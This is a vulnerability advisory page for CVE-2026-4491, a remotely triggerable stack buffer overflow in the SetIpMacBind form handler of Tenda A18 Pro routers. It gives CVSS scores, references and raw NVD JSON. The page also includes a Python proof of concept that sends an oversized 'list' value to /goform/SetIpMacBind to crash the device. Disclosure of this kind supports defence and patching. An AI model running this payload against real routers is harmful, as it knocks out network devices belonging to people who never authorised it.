CVE-2026-4491

Description

A vulnerability has been found in Tenda A18 Pro 02.03.02.28. Impacted is the function fromSetIpMacBind of the file /goform/SetIpMacBind. Such manipulation of the argument list leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Tenda A18 Pro 02.03.02.28

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_ip):
    """
    PoC for CVE-2026-4491
    Target: Tenda A18 Pro 02.03.02.28
    Vulnerability: Stack-based Buffer Overflow in fromSetIpMacBind
    """
    url = f"http://{target_ip}/goform/SetIpMacBind"
    
    # Constructing a malicious payload to trigger the buffer overflow
    # The exact length to overwrite the return address depends on the specific stack layout
    # This payload sends a large string to cause a crash/DoS
    payload = "A" * 1000
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    
    data = {
        "list": payload,
        "goformId": "SetIpMacBind"
    }
    
    try:
        print(f"[+] Sending payload to {url}...")
        response = requests.post(url, data=data, headers=headers, timeout=5)
        print(f"[+] Response status code: {response.status_code}")
        print("[+] Check if the device has crashed or rebooted.")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual IP address of the target device
    target = "192.168.0.1"
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4491
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4491
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4491/
[4] VulDB https://vuldb.com/cve/CVE-2026-4491
[5] https://github.com/lilukun337/cve/issues/3
[6] https://vuldb.com/?ctiid.352017
[7] https://vuldb.com/?id.352017
[8] https://vuldb.com/?submit.773671
[9] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4491", "sourceIdentifier": "[email protected]", "published": "2026-03-20T17:17:00.240", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Tenda A18 Pro 02.03.02.28. Impacted is the function fromSetIpMacBind of the file /goform/SetIpMacBind. Such manipulation of the argument list leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed to the public and may be used."}, {"lang": "es", "value": "Una vulnerabilidad ha sido encontrada en Tenda A18 Pro 02.03.02.28. Afectada es la función fromSetIpMacBind del archivo /goform/SetIpMacBind. Tal manipulación de la lista de argumentos lleva a desbordamiento de búfer basado en pila. El ataque puede ser ejecutado remotamente. El exploit ha sido divulgado al público y puede ser usado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/lilukun337/cve/issues/3", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.352017", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.352017", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.773671", "source": "[email protected]"}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]"}]}}